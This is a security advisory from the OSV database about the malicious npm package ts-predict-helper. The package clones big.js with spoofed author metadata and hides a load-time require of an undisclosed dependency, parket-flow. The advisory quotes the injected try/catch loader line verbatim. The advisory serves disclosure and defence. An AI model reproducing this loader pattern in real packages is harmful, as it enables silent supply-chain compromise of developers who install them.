ts-predict-helper @3.7.1
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6322
Ecosystem
npm
Summary
Package is published as ts-predict-helper but ships a byte-equivalent copy of big.js v7.0.1's source and README (which states 'No dependencies'), along with spoofed package.json metadata pointing at MikeMcl/big.js and naming Michael Mclaughlin as author. Inside the otherwise-verbatim big.js source (around line 530) an injected try/catch block runs at module load: try { const doc = require("parket-flow"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. The package declares an undisclosed runtime dependency on parket-flow ^3.0.1, which is unrelated to arbitrary-precision arithmetic and is the actual payload carrier. Any consumer who installs ts-predict-helper (e.g. via a copy-pasted install snippet) and loads it with require() will silently pull parket-flow into their dependency tree and invoke its from_str() API in-process, with all errors swallowed to hide failure. The combination of identity spoofing (verbatim README/source/author/repo metadata under an unrelated package name) and a hidden side-effect require at load time is a textbook trojan-loader supply-chain pattern; whatever code parket-flow ships executes in the installer's Node.js process.
Source: amazon-inspector (7efbafcedfb49da5093c3972473a549694dd9dd748281a299034c31578db1943)